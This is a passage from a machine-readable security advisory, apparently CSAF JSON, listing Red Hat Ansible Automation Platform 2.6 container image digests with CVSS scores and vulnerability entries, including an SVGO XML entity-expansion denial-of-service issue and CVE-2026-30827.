"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "svgo: SVGO: Denial of Service via XML entity expansion"
},
{
"cve": "CVE-2026-30827",
"cwe": {
"id": "CWE-1389",
"name": "Incorrect Parsing of Numbers with Different Radices"
},
"discovery_date": "2026-03-07T06:01:06.325390+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
